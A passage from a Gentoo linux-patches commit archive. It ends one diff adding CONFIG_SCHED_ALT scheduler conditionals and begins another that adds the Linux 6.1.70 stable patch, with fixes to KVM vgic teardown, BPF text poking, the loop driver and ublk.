+@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
+
+ #endif /* CONFIG_SCHEDSTATS */
+
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_FAIR_GROUP_SCHED
+ struct sched_entity_stats {
+ 	struct sched_entity     se;
+@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
+ #endif
+ 	return &task_of(se)->stats;
+ }
++#endif /* CONFIG_SCHED_ALT */
+
+ #ifdef CONFIG_PSI
+ void psi_task_change(struct task_struct *task, int clear, int set);
+diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
+index 8739c2a5a54e..d8dd6c15eb47 100644
+--- a/kernel/sched/topology.c
++++ b/kernel/sched/topology.c
+@@ -3,6 +3,7 @@
+  * Scheduler topology setup/handling methods
+  */
+
++#ifndef CONFIG_SCHED_ALT
+ DEFINE_MUTEX(sched_domains_mutex);
+
+ /* Protected by sched_domains_mutex: */
+@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
+  */
+
+ static int default_relax_domain_level = -1;
++#endif /* CONFIG_SCHED_ALT */
+ int sched_domain_level_max;
+
++#ifndef CONFIG_SCHED_ALT
+ static int __init setup_relax_domain_level(char *str)
+ {
+ 	if (kstrtoint(str, 0, &default_relax_domain_level))
+@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
+
+ 	return sd;
+ }
++#endif /* CONFIG_SCHED_ALT */
+
+ /*
+  * Topology list, bottom-up.
+@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
+ 	sched_domain_topology_saved = NULL;
+ }
+
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA
+
+ static const struct cpumask *sd_numa_mask(int cpu)
+@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+ 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
+ 	mutex_unlock(&sched_domains_mutex);
+ }
++#else /* CONFIG_SCHED_ALT */
++void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
++			     struct sched_domain_attr *dattr_new)
++{}
++
++#ifdef CONFIG_NUMA
++int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return best_mask_cpu(cpu, cpus);
++}
++#endif /* CONFIG_NUMA */
++#endif
+diff --git a/kernel/sysctl.c b/kernel/sysctl.c
+index c6d9dec11b74..2bc42ce8b48e 100644
+--- a/kernel/sysctl.c
++++ b/kernel/sysctl.c
+@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
+
+ /* Constants used for minimum and maximum */
+
++#ifdef CONFIG_SCHED_ALT
++extern int sched_yield_type;
++#endif
++
+ #ifdef CONFIG_PERF_EVENTS
+ static const int six_hundred_forty_kb = 640 * 1024;
+ #endif
+@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
+ }
+
+ static struct ctl_table kern_table[] = {
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA_BALANCING
+ 	{
+ 		.procname	= "numa_balancing",
+@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
+ 		.extra1		= SYSCTL_ZERO,
+ 	},
+ #endif /* CONFIG_NUMA_BALANCING */
++#endif /* !CONFIG_SCHED_ALT */
+ 	{
+ 		.procname	= "panic",
+ 		.data		= &panic_timeout,
+@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
+ 		.proc_handler	= proc_dointvec,
+ 	},
+ #endif
++#ifdef CONFIG_SCHED_ALT
++	{
++		.procname	= "yield_type",
++		.data		= &sched_yield_type,
++		.maxlen		= sizeof (int),
++		.mode		= 0644,
++		.proc_handler	= &proc_dointvec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= SYSCTL_TWO,
++	},
++#endif
+ #if defined(CONFIG_S390) && defined(CONFIG_SMP)
+ 	{
+ 		.procname	= "spin_retry",
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab6260..35f0176dcdb0 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
+ 	int ret = 0;
+ 	u64 slack;
+
++#ifndef CONFIG_SCHED_ALT
+ 	slack = current->timer_slack_ns;
+ 	if (dl_task(current) || rt_task(current))
++#endif
+ 		slack = 0;
+
+ 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8..67d823510f5c 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
+ 	u64 stime, utime;
+
+ 	task_cputime(p, &utime, &stime);
+-	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
++	store_samples(samples, stime, utime, tsk_seruntime(p));
+ }
+
+ static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
+@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
+ 	}
+ }
+
++#ifndef CONFIG_SCHED_ALT
+ static inline void check_dl_overrun(struct task_struct *tsk)
+ {
+ 	if (tsk->dl.dl_overrun) {
+@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
+ 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
+ 	}
+ }
++#endif
+
+ static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
+ {
+@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	u64 samples[CPUCLOCK_MAX];
+ 	unsigned long soft;
+
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk))
+ 		check_dl_overrun(tsk);
++#endif
+
+ 	if (expiry_cache_is_inactive(pct))
+ 		return;
+@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
+ 	if (soft != RLIM_INFINITY) {
+ 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
+-		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
++		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
+ 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
+
+ 		/* At the hard limit, send SIGKILL. No further action. */
+@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
+ 			return true;
+ 	}
+
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk) && tsk->dl.dl_overrun)
+ 		return true;
++#endif
+
+ 	return false;
+ }
+diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
+index a2d301f58ced..2ccdede8585c 100644
+--- a/kernel/trace/trace_selftest.c
++++ b/kernel/trace/trace_selftest.c
+@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
+ {
+ 	/* Make this a -deadline thread */
+ 	static const struct sched_attr attr = {
++#ifdef CONFIG_SCHED_ALT
++		/* No deadline on BMQ/PDS, use RR */
++		.sched_policy = SCHED_RR,
++#else
+ 		.sched_policy = SCHED_DEADLINE,
+ 		.sched_runtime = 100000ULL,
+ 		.sched_deadline = 10000000ULL,
+ 		.sched_period = 10000000ULL
++#endif
+ 	};
+ 	struct wakeup_test_data *x = data;
+
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+index 03772805e4f9f1bf881740c8dd14aef667fbecf2..4742bbdfb2d715a439c0d505b4f293a82b76b255 100644
+--- a/kernel/sched/alt_core.c
++++ b/kernel/sched/alt_core.c
+@@ -5661,9 +5661,6 @@ static int __sched_setscheduler(struct task_struct *p,
+ 			return retval;
+ 	}
+
+-	if (pi)
+-		cpuset_read_lock();
+-
+ 	/*
+ 	 * Make sure no PI-waiters arrive (or leave) while we are
+ 	 * changing the priority of the task:
+@@ -5709,8 +5706,6 @@ static int __sched_setscheduler(struct task_struct *p,
+ 		policy = oldpolicy = -1;
+ 		__task_access_unlock(p, lock);
+ 		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
+-		if (pi)
+-			cpuset_read_unlock();
+ 		goto recheck;
+ 	}
+
+@@ -5741,10 +5736,8 @@ static int __sched_setscheduler(struct task_struct *p,
+ 	__task_access_unlock(p, lock);
+ 	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
+
+-	if (pi) {
+-		cpuset_read_unlock();
++	if (pi)
+ 		rt_mutex_adjust_pi(p);
+-	}
+
+ 	/* Run balance callbacks after we've adjusted the PI chain: */
+ 	balance_callbacks(rq, head);
+@@ -5755,8 +5748,6 @@ static int __sched_setscheduler(struct task_struct *p,
+ unlock:
+ 	__task_access_unlock(p, lock);
+ 	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
+-	if (pi)
+-		cpuset_read_unlock();
+ 	return retval;
+ }
+
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index 2f6606f4a3ec941f78b85a8ff997f2a6c0405218..71f5da268ee8e597ee15b2b440b4a80f8a6adb1c 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -2509,12 +2509,15 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 		if (ret)
+ 			goto out_unlock;
+
++#ifndef CONFIG_SCHED_ALT
+ 		if (dl_task(task)) {
+ 			cs->nr_migrate_dl_tasks++;
+ 			cs->sum_migrate_dl_bw += task->dl.dl_bw;
+ 		}
++#endif
+ 	}
+
++#ifndef CONFIG_SCHED_ALT
+ 	if (!cs->nr_migrate_dl_tasks)
+ 		goto out_success;
+
+@@ -2535,6 +2538,7 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 	}
+
+ out_success:
++#endif
+ 	/*
+ 	 * Mark attach is in progress.  This makes validate_change() fail
+ 	 * changes which zero cpus/mems_allowed.
+@@ -2558,12 +2562,14 @@ static void cpuset_cancel_attach(struct cgroup_taskset *tset)
+ 	if (!cs->attach_in_progress)
+ 		wake_up(&cpuset_attach_wq);
+
++#ifndef CONFIG_SCHED_ALT
+ 	if (cs->nr_migrate_dl_tasks) {
+ 		int cpu = cpumask_any(cs->effective_cpus);
+
+ 		dl_bw_free(cpu, cs->sum_migrate_dl_bw);
+ 		reset_migrate_dl_data(cs);
+ 	}
++#endif
+
+ 	mutex_unlock(&cpuset_mutex);
+ }
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+index 4742bbdfb2d715a439c0d505b4f293a82b76b255..8badb54c7d7b00bba30dbbd7206feeafbf919af2 100644
+--- a/kernel/sched/alt_core.c
++++ b/kernel/sched/alt_core.c
+@@ -7156,8 +7156,7 @@ int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
+ 	return 1;
+ }
+
+-int task_can_attach(struct task_struct *p,
+-		    const struct cpumask *cs_effective_cpus)
++int task_can_attach(struct task_struct *p)
+ {
+ 	int ret = 0;
+


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-01 13:46 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-01 13:46 UTC (permalink / raw
  To: gentoo-commits

commit:     d06c13ad6787d24145cad16670840bd81a4418b8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Jan  1 13:46:43 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Jan  1 13:46:43 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d06c13ad

Linux patch 6.1.70

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1069_linux-6.1.70.patch | 5394 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5398 insertions(+)

diff --git a/0000_README b/0000_README
index 3d9aed2d..f806635e 100644
--- a/0000_README
+++ b/0000_README
@@ -319,6 +319,10 @@ Patch:  1068_linux-6.1.69.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.69
 
+Patch:  1069_linux-6.1.70.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.70
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1069_linux-6.1.70.patch b/1069_linux-6.1.70.patch
new file mode 100644
index 00000000..f22e31fe
--- /dev/null
+++ b/1069_linux-6.1.70.patch
@@ -0,0 +1,5394 @@
+diff --git a/Documentation/devicetree/bindings/nvmem/mxs-ocotp.yaml b/Documentation/devicetree/bindings/nvmem/mxs-ocotp.yaml
+index ff317fd7c15bf..2e1fcff3c2801 100644
+--- a/Documentation/devicetree/bindings/nvmem/mxs-ocotp.yaml
++++ b/Documentation/devicetree/bindings/nvmem/mxs-ocotp.yaml
+@@ -14,9 +14,11 @@ allOf:
+ 
+ properties:
+   compatible:
+-    enum:
+-      - fsl,imx23-ocotp
+-      - fsl,imx28-ocotp
++    items:
++      - enum:
++          - fsl,imx23-ocotp
++          - fsl,imx28-ocotp
++      - const: fsl,ocotp
+ 
+   "#address-cells":
+     const: 1
+@@ -40,7 +42,7 @@ additionalProperties: false
+ examples:
+   - |
+     ocotp: efuse@8002c000 {
+-        compatible = "fsl,imx28-ocotp";
++        compatible = "fsl,imx28-ocotp", "fsl,ocotp";
+         #address-cells = <1>;
+         #size-cells = <1>;
+         reg = <0x8002c000 0x2000>;
+diff --git a/Makefile b/Makefile
+index 9a3b34d2387fa..270593fcafdcd 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 69
++SUBLEVEL = 70
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/dra7.dtsi b/arch/arm/boot/dts/dra7.dtsi
+index 97ce0c4f1df7e..a79920ec461f0 100644
+--- a/arch/arm/boot/dts/dra7.dtsi
++++ b/arch/arm/boot/dts/dra7.dtsi
+@@ -144,7 +144,7 @@
+ 
+ 		l3-noc@44000000 {
+ 			compatible = "ti,dra7-l3-noc";
+-			reg = <0x44000000 0x1000>,
++			reg = <0x44000000 0x1000000>,
+ 			      <0x45000000 0x1000>;
+ 			interrupts-extended = <&crossbar_mpu GIC_SPI 4 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&wakeupgen GIC_SPI 10 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm/mach-omap2/id.c b/arch/arm/mach-omap2/id.c
+index 59755b5a1ad7a..75091aa7269ae 100644
+--- a/arch/arm/mach-omap2/id.c
++++ b/arch/arm/mach-omap2/id.c
+@@ -793,11 +793,16 @@ void __init omap_soc_device_init(void)
+ 
+ 	soc_dev_attr->machine  = soc_name;
+ 	soc_dev_attr->family   = omap_get_family();
++	if (!soc_dev_attr->family) {
++		kfree(soc_dev_attr);
++		return;
++	}
+ 	soc_dev_attr->revision = soc_rev;
+ 	soc_dev_attr->custom_attr_group = omap_soc_groups[0];
+ 
+ 	soc_dev = soc_device_register(soc_dev_attr);
+ 	if (IS_ERR(soc_dev)) {
++		kfree(soc_dev_attr->family);
+ 		kfree(soc_dev_attr);
+ 		return;
+ 	}
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index 6cc380a15eb76..de94515fb17c6 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -386,7 +386,7 @@ void kvm_arch_vcpu_destroy(struct kvm_vcpu *vcpu)
+ 	kvm_mmu_free_memory_cache(&vcpu->arch.mmu_page_cache);
+ 	kvm_timer_vcpu_terminate(vcpu);
+ 	kvm_pmu_vcpu_destroy(vcpu);
+-
++	kvm_vgic_vcpu_destroy(vcpu);
+ 	kvm_arm_vcpu_destroy(vcpu);
+ }
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index f2f3bf4a04b0b..0919e3b8f46ec 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -368,7 +368,7 @@ static void kvm_vgic_dist_destroy(struct kvm *kvm)
+ 		vgic_v4_teardown(kvm);
+ }
+ 
+-void kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
++static void __kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
+ {
+ 	struct vgic_cpu *vgic_cpu = &vcpu->arch.vgic_cpu;
+ 
+@@ -379,29 +379,39 @@ void kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
+ 	vgic_flush_pending_lpis(vcpu);
+ 
+ 	INIT_LIST_HEAD(&vgic_cpu->ap_list_head);
+-	vgic_cpu->rd_iodev.base_addr = VGIC_ADDR_UNDEF;
++	if (vcpu->kvm->arch.vgic.vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3) {
++		vgic_unregister_redist_iodev(vcpu);
++		vgic_cpu->rd_iodev.base_addr = VGIC_ADDR_UNDEF;
++	}
+ }
+ 
+-static void __kvm_vgic_destroy(struct kvm *kvm)
++void kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
++{
++	struct kvm *kvm = vcpu->kvm;
++
++	mutex_lock(&kvm->slots_lock);
++	__kvm_vgic_vcpu_destroy(vcpu);
++	mutex_unlock(&kvm->slots_lock);
++}
++
++void kvm_vgic_destroy(struct kvm *kvm)
+ {
+ 	struct kvm_vcpu *vcpu;
+ 	unsigned long i;
+ 
+-	lockdep_assert_held(&kvm->arch.config_lock);
++	mutex_lock(&kvm->slots_lock);
+ 
+ 	vgic_debug_destroy(kvm);
+ 
+ 	kvm_for_each_vcpu(i, vcpu, kvm)
+-		kvm_vgic_vcpu_destroy(vcpu);
++		__kvm_vgic_vcpu_destroy(vcpu);
++
++	mutex_lock(&kvm->arch.config_lock);
+ 
+ 	kvm_vgic_dist_destroy(kvm);
+-}
+ 
+-void kvm_vgic_destroy(struct kvm *kvm)
+-{
+-	mutex_lock(&kvm->arch.config_lock);
+-	__kvm_vgic_destroy(kvm);
+ 	mutex_unlock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->slots_lock);
+ }
+ 
+ /**
+@@ -469,25 +479,26 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 		type = VGIC_V3;
+ 	}
+ 
+-	if (ret) {
+-		__kvm_vgic_destroy(kvm);
++	if (ret)
+ 		goto out;
+-	}
++
+ 	dist->ready = true;
+ 	dist_base = dist->vgic_dist_base;
+ 	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	ret = vgic_register_dist_iodev(kvm, dist_base, type);
+-	if (ret) {
++	if (ret)
+ 		kvm_err("Unable to register VGIC dist MMIO regions\n");
+-		kvm_vgic_destroy(kvm);
+-	}
+-	mutex_unlock(&kvm->slots_lock);
+-	return ret;
+ 
++	goto out_slots;
+ out:
+ 	mutex_unlock(&kvm->arch.config_lock);
++out_slots:
+ 	mutex_unlock(&kvm->slots_lock);
++
++	if (ret)
++		kvm_vgic_destroy(kvm);
++
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index 188d2187eede9..871a45d4fc84c 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -820,7 +820,7 @@ out_unlock:
+ 	return ret;
+ }
+ 
+-static void vgic_unregister_redist_iodev(struct kvm_vcpu *vcpu)
++void vgic_unregister_redist_iodev(struct kvm_vcpu *vcpu)
+ {
+ 	struct vgic_io_device *rd_dev = &vcpu->arch.vgic_cpu.rd_iodev;
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic.h b/arch/arm64/kvm/vgic/vgic.h
+index 23e280fa0a16f..9f80a580ca771 100644
+--- a/arch/arm64/kvm/vgic/vgic.h
++++ b/arch/arm64/kvm/vgic/vgic.h
+@@ -229,6 +229,7 @@ int vgic_v3_lpi_sync_pending_status(struct kvm *kvm, struct vgic_irq *irq);
+ int vgic_v3_save_pending_tables(struct kvm *kvm);
+ int vgic_v3_set_redist_base(struct kvm *kvm, u32 index, u64 addr, u32 count);
+ int vgic_register_redist_iodev(struct kvm_vcpu *vcpu);
++void vgic_unregister_redist_iodev(struct kvm_vcpu *vcpu);
+ bool vgic_v3_check_base(struct kvm *kvm);
+ 
+ void vgic_v3_load(struct kvm_vcpu *vcpu);
+diff --git a/arch/riscv/include/asm/signal.h b/arch/riscv/include/asm/signal.h
+index 532c29ef03769..956ae0a01bad1 100644
+--- a/arch/riscv/include/asm/signal.h
++++ b/arch/riscv/include/asm/signal.h
+@@ -7,6 +7,6 @@
+ #include <uapi/asm/ptrace.h>
+ 
+ asmlinkage __visible
+-void do_notify_resume(struct pt_regs *regs, unsigned long thread_info_flags);
++void do_work_pending(struct pt_regs *regs, unsigned long thread_info_flags);
+ 
+ #endif
+diff --git a/arch/s390/include/asm/fpu/api.h b/arch/s390/include/asm/fpu/api.h
+index b714ed0ef6885..9acf48e53a87f 100644
+--- a/arch/s390/include/asm/fpu/api.h
++++ b/arch/s390/include/asm/fpu/api.h
+@@ -79,7 +79,7 @@ static inline int test_fp_ctl(u32 fpc)
+ #define KERNEL_VXR_HIGH		(KERNEL_VXR_V16V23|KERNEL_VXR_V24V31)
+ 
+ #define KERNEL_VXR		(KERNEL_VXR_LOW|KERNEL_VXR_HIGH)
+-#define KERNEL_FPR		(KERNEL_FPC|KERNEL_VXR_V0V7)
++#define KERNEL_FPR		(KERNEL_FPC|KERNEL_VXR_LOW)
+ 
+ struct kernel_fpu;
+ 
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index 46b7ee0ab01a4..6b8c93989aa31 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -1015,8 +1015,8 @@ void __init_or_module text_poke_early(void *addr, const void *opcode,
+ 	} else {
+ 		local_irq_save(flags);
+ 		memcpy(addr, opcode, len);
+-		local_irq_restore(flags);
+ 		sync_core();
++		local_irq_restore(flags);
+ 
+ 		/*
+ 		 * Could also do a CLFLUSH here to speed up CPU recovery; but
+diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c
+index 5e680e039d0e1..4686c1d9d0cfd 100644
+--- a/arch/x86/net/bpf_jit_comp.c
++++ b/arch/x86/net/bpf_jit_comp.c
+@@ -2553,3 +2553,49 @@ void bpf_jit_free(struct bpf_prog *prog)
+ 
+ 	bpf_prog_unlock_free(prog);
+ }
++
++void bpf_arch_poke_desc_update(struct bpf_jit_poke_descriptor *poke,
++			       struct bpf_prog *new, struct bpf_prog *old)
++{
++	u8 *old_addr, *new_addr, *old_bypass_addr;
++	int ret;
++
++	old_bypass_addr = old ? NULL : poke->bypass_addr;
++	old_addr = old ? (u8 *)old->bpf_func + poke->adj_off : NULL;
++	new_addr = new ? (u8 *)new->bpf_func + poke->adj_off : NULL;
++
++	/*
++	 * On program loading or teardown, the program's kallsym entry
++	 * might not be in place, so we use __bpf_arch_text_poke to skip
++	 * the kallsyms check.
++	 */
++	if (new) {
++		ret = __bpf_arch_text_poke(poke->tailcall_target,
++					   BPF_MOD_JUMP,
++					   old_addr, new_addr);
++		BUG_ON(ret < 0);
++		if (!old) {
++			ret = __bpf_arch_text_poke(poke->tailcall_bypass,
++						   BPF_MOD_JUMP,
++						   poke->bypass_addr,
++						   NULL);
++			BUG_ON(ret < 0);
++		}
++	} else {
++		ret = __bpf_arch_text_poke(poke->tailcall_bypass,
++					   BPF_MOD_JUMP,
++					   old_bypass_addr,
++					   poke->bypass_addr);
++		BUG_ON(ret < 0);
++		/* let other CPUs finish executing the program
++		 * so that it will not be possible to expose them
++		 * to invalid nop, stack unwind, nop state
++		 */
++		if (!ret)
++			synchronize_rcu();
++		ret = __bpf_arch_text_poke(poke->tailcall_target,
++					   BPF_MOD_JUMP,
++					   old_addr, NULL);
++		BUG_ON(ret < 0);
++	}
++}
+diff --git a/arch/x86/xen/Kconfig b/arch/x86/xen/Kconfig
+index 9b1ec5d8c99c8..a65fc2ae15b49 100644
+--- a/arch/x86/xen/Kconfig
++++ b/arch/x86/xen/Kconfig
+@@ -9,6 +9,7 @@ config XEN
+ 	select PARAVIRT_CLOCK
+ 	select X86_HV_CALLBACK_VECTOR
+ 	depends on X86_64 || (X86_32 && X86_PAE)
++	depends on X86_64 || (X86_GENERIC || MPENTIUM4 || MCORE2 || MATOM || MK8)
+ 	depends on X86_LOCAL_APIC && X86_TSC
+ 	help
+ 	  This is the Linux Xen port.  Enabling this will allow the
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 426d0b42685a0..127e3ceb59799 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1777,14 +1777,43 @@ static const struct block_device_operations lo_fops = {
+ /*
+  * If max_loop is specified, create that many devices upfront.
+  * This also becomes a hard limit. If max_loop is not specified,
++ * the default isn't a hard limit (as before commit 85c50197716c
++ * changed the default value from 0 for max_loop=0 reasons), just
+  * create CONFIG_BLK_DEV_LOOP_MIN_COUNT loop devices at module
+  * init time. Loop devices can be requested on-demand with the
+  * /dev/loop-control interface, or be instantiated by accessing
+  * a 'dead' device node.
+  */
+ static int max_loop = CONFIG_BLK_DEV_LOOP_MIN_COUNT;
+-module_param(max_loop, int, 0444);
++
++#ifdef CONFIG_BLOCK_LEGACY_AUTOLOAD
++static bool max_loop_specified;
++
++static int max_loop_param_set_int(const char *val,
++				  const struct kernel_param *kp)
++{
++	int ret;
++
++	ret = param_set_int(val, kp);
++	if (ret < 0)
++		return ret;
++
++	max_loop_specified = true;
++	return 0;
++}
++
++static const struct kernel_param_ops max_loop_param_ops = {
++	.set = max_loop_param_set_int,
++	.get = param_get_int,
++};
++
++module_param_cb(max_loop, &max_loop_param_ops, &max_loop, 0444);
+ MODULE_PARM_DESC(max_loop, "Maximum number of loop devices");
++#else
++module_param(max_loop, int, 0444);
++MODULE_PARM_DESC(max_loop, "Initial number of loop devices");
++#endif
++
+ module_param(max_part, int, 0444);
+ MODULE_PARM_DESC(max_part, "Maximum number of partitions per loop device");
+ 
+@@ -2089,14 +2118,18 @@ static void loop_remove(struct loop_device *lo)
+ 	put_disk(lo->lo_disk);
+ }
+ 
++#ifdef CONFIG_BLOCK_LEGACY_AUTOLOAD
+ static void loop_probe(dev_t dev)
+ {
+ 	int idx = MINOR(dev) >> part_shift;
+ 
+-	if (max_loop && idx >= max_loop)
++	if (max_loop_specified && max_loop && idx >= max_loop)
+ 		return;
+ 	loop_add(idx);
+ }
++#else
++#define loop_probe NULL
++#endif /* !CONFIG_BLOCK_LEGACY_AUTOLOAD */
+ 
+ static int loop_control_remove(int idx)
+ {
+@@ -2277,6 +2310,9 @@ module_exit(loop_exit);
+ static int __init max_loop_setup(char *str)
+ {
+ 	max_loop = simple_strtol(str, NULL, 0);
++#ifdef CONFIG_BLOCK_LEGACY_AUTOLOAD
++	max_loop_specified = true;
++#endif
+ 	return 1;
+ }
+ 
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index c2f0f74193f0e..3fa74051f31b4 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -103,6 +103,9 @@ struct ublk_uring_cmd_pdu {
+  */
+ #define UBLK_IO_FLAG_NEED_GET_DATA 0x08
+ 
++/* atomic RW with ubq->cancel_lock */
++#define UBLK_IO_FLAG_CANCELED	0x80000000
++
+ struct ublk_io {
+ 	/* userspace buffer address from io cmd */
+ 	__u64	addr;
+@@ -126,6 +129,7 @@ struct ublk_queue {
+ 	unsigned int max_io_sz;
+ 	bool force_abort;
+ 	unsigned short nr_io_ready;	/* how many ios setup */
++	spinlock_t		cancel_lock;
+ 	struct ublk_device *dev;
+ 	struct ublk_io ios[];
+ };
+@@ -1045,28 +1049,28 @@ static inline bool ublk_queue_ready(struct ublk_queue *ubq)
+ 	return ubq->nr_io_ready == ubq->q_depth;
+ }
+ 
+-static void ublk_cmd_cancel_cb(struct io_uring_cmd *cmd, unsigned issue_flags)
+-{
+-	io_uring_cmd_done(cmd, UBLK_IO_RES_ABORT, 0, issue_flags);
+-}
+-
+ static void ublk_cancel_queue(struct ublk_queue *ubq)
+ {
+ 	int i;
+ 
+-	if (!ublk_queue_ready(ubq))
+-		return;
+-
+ 	for (i = 0; i < ubq->q_depth; i++) {
+ 		struct ublk_io *io = &ubq->ios[i];
+ 
+-		if (io->flags & UBLK_IO_FLAG_ACTIVE)
+-			io_uring_cmd_complete_in_task(io->cmd,
+-						      ublk_cmd_cancel_cb);
+-	}
++		if (io->flags & UBLK_IO_FLAG_ACTIVE) {
++			bool done;
+ 
+-	/* all io commands are canceled */
+-	ubq->nr_io_ready = 0;
++			spin_lock(&ubq->cancel_lock);
++			done = !!(io->flags & UBLK_IO_FLAG_CANCELED);
++			if (!done)
++				io->flags |= UBLK_IO_FLAG_CANCELED;
++			spin_unlock(&ubq->cancel_lock);
++
++			if (!done)
++				io_uring_cmd_done(io->cmd,
++						UBLK_IO_RES_ABORT, 0,
++						IO_URING_F_UNLOCKED);
++		}
++	}
+ }
+ 
